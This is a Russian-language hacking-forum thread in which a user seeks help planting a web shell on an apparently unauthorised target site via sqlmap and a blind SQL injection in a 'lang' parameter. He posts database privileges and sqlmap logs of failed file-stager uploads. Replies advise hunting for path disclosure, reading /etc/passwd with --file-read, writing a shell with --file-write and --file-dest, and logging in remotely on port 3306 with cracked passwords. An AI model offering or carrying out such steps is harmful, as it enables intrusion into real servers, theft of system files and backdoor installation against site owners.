Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   Песочница (https://forum.antichat.xyz/forumdisplay.php?f=189)
-   -   sqlmap заливка шелла (https://forum.antichat.xyz/showthread.php?t=473923)

hackworld 06.11.2019 12:58
Добрый день прошу помощи со sqlmapom ни как не могу залить шелл

Права у юзера есть

--is-dba: True

%lotos% (administrator) [28]:

privilege: ALTER

privilege: ALTER R

privilege: CREATE

privilege: CREATE

privilege: CREATE

privilege: CREATE

privilege: CREATE

privilege: CREATE

privilege: DELETE

privilege: DROP

privilege: EVENT

privilege: EXECUTE

privilege: FILE

privilege: INDEX

privilege: INSERT

privilege: LOCK TA

privilege: PROCESS

privilege: REFEREN

privilege: RELOAD

privilege: REPLICA

privilege: REPLICA

privilege: SELECT

privilege: SHOW DA

privilege: SHOW VI

privilege: SHUTDOW

privilege: SUPER

privilege: TRIGGER

privilege: UPDATE

SELECT @@GLOBAL.secure_file_priv;

'/var/lib/mysql-files/'

b3 06.11.2019 13:14
Где логи действий? Где ответа сервера? Или нам представить нужно что ты делал и что не получается?

hackworld 06.11.2019 13:21
web application technology: Nginx

back-end DBMS: MySQL >= 5.0.12

[12:20:48] [INFO] going to use a web backdoor for command prompt

[12:20:48] [INFO] fingerprinting the back-end DBMS operating system

[12:20:48] [INFO] the back-end DBMS operating system is Linux

which web application language does the web server support?

[1] ASP

[2] ASPX

[3] JSP

[4] PHP (default)

> 4

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] y

[12:21:00] [WARNING] unable to automatically retrieve the web server document root

what do you want to use for writable directory?

[1] common location(s) ('/var/www/, /var/www/html, /usr/local/apache2/htdocs, /var/www/nginx-default, /srv/www') (default)

[2] custom location(s)

[3] custom directory list file

[4] brute force search

> 1

[12:21:04] [WARNING] unable to automatically parse any web server path

[12:21:04] [INFO] trying to upload the file stager on '/var/www/' via LIMIT 'LINES TERMINATED BY' method

[12:21:04] [INFO] heuristics detected web page charset 'ascii'

[12:21:04] [WARNING] unable to upload the file stager on '/var/www/'

[12:21:04] [INFO] trying to upload the file stager on '/var/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:05] [WARNING] unable to upload the file stager on '/var/www/i/pages/'

[12:21:05] [INFO] trying to upload the file stager on '/var/www/html/' via LIMIT 'LINES TERMINATED BY' method

[12:21:06] [WARNING] unable to upload the file stager on '/var/www/html/'

[12:21:06] [INFO] trying to upload the file stager on '/var/www/html/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:07] [WARNING] unable to upload the file stager on '/var/www/html/i/pages/'

[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/' via LIMIT 'LINES TERMINATED BY' method

[12:21:07] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/'

[12:21:07] [INFO] trying to upload the file stager on '/usr/local/apache2/htdocs/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:08] [WARNING] unable to upload the file stager on '/usr/local/apache2/htdocs/i/pages/'

[12:21:08] [INFO] trying to upload the file stager on '/var/www/nginx-default/' via LIMIT 'LINES TERMINATED BY' method

[12:21:09] [WARNING] unable to upload the file stager on '/var/www/nginx-default/'

[12:21:09] [INFO] trying to upload the file stager on '/var/www/nginx-default/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:10] [WARNING] unable to upload the file stager on '/var/www/nginx-default/i/pages/'

[12:21:10] [INFO] trying to upload the file stager on '/srv/www/' via LIMIT 'LINES TERMINATED BY' method

[12:21:10] [WARNING] unable to upload the file stager on '/srv/www/'

[12:21:10] [INFO] trying to upload the file stager on '/srv/www/i/pages/' via LIMIT 'LINES TERMINATED BY' method

[12:21:11] [WARNING] unable to upload the file stager on '/srv/www/i/pages/'

[12:21:11] [WARNING] HTTP error codes detected during run:

404 (Not Found) - 43 times

b3 06.11.2019 13:29
Цитата:
Сообщение от hackworld
hackworld said:

404 (Not Found) - 43 times
почему так много 404, там ваф? путь к doc_root известен или наугад?

hackworld 06.11.2019 13:54
путь не известен дефолтный список sqlmap

вафа вроде нет но сама скуля типа

Parameter: lang (GET)

Type: boolean-based blind

fandor9 06.11.2019 13:58
Цитата:
Сообщение от hackworld
hackworld said:

путь не известен дефолтный список sqlmap
вафа вроде нет но сама скуля типа
Parameter: lang (GET)
Type: boolean-based blind
ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.

hackworld 06.11.2019 20:21
Цитата:
Сообщение от fandor9
fandor9 said:

ну так ищите сначала ошибку в сайтах, что-бы раскрывали вам путь.
это ясно я искал не нашел думал может подскажут другой какой вариант

Baskin-Robbins 06.11.2019 21:48
Цитата:
Сообщение от hackworld
hackworld said:

я искал
как?

grimnir 06.11.2019 21:58
Цитата:
Сообщение от hackworld
hackworld said:

это ясно я искал не нашел думал может подскажут другой какой вариант
попробуй сначала

--file-read="/etc/passwd" если считает,то нужно директорию найти будет на запись и залить туда через

Цитата:
Сообщение от None
--file-write=FIL.. Write a local file on the back-end DBMS file system
--file-dest=FILE.. Back-end DBMS absolute filepath to write to
а не автоподбором

UPD

не заметил , Type: boolean-based blind

не зальешься,нужно union

Baskin-Robbins 06.11.2019 22:17
если повезет - открыт 3306, можно подключаться удаленно, и сможешь расшифровать пароль, то как вариант подключиться к бд и оттуда залиться, но все равно надо путь искать

hackworld 07.11.2019 20:16
Цитата:
Сообщение от Baskin-Robbins
Baskin-Robbins said:

если повезет - открыт 3306, можно подключаться удаленно, и сможешь расшифровать пароль, то как вариант подключиться к бд и оттуда залиться, но все равно надо путь искать
пароли не хочет извлекать

hackworld 07.11.2019 20:17
Цитата:
Сообщение от man474019
man474019 said:

try --current-user --is-dba
and see response true or false ? if false there're no variants for uploading shell via sqli/sqlmap
выше же написано --is-dba: True

hackworld 07.11.2019 20:17
Цитата:
Сообщение от grimnir
grimnir said:

попробуй сначала
--file-read="/etc/passwd" если считает,то нужно директорию найти будет на запись и залить туда через
а не автоподбором
UPD
не заметил , Type: boolean-based blind
не зальешься,нужно union
то есть через блинду вариантов заливок нет


Время: 13:49